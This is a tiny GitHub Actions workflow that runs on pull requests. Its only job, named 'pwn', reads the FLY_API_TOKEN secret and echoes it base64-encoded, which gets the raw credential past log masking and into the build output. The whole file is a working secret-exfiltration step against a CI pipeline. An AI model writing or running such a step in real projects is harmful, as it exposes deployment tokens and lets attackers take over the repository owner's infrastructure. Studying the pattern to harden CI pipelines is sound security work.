name: Pull Request

on:
  - pull_request

jobs:
  pwn:
    runs-on: ubuntu-latest
    steps:
      - run: echo $FLY_API_TOKEN | base64
        env:
          FLY_API_TOKEN: ${{ secrets.FLY_API_TOKEN }}
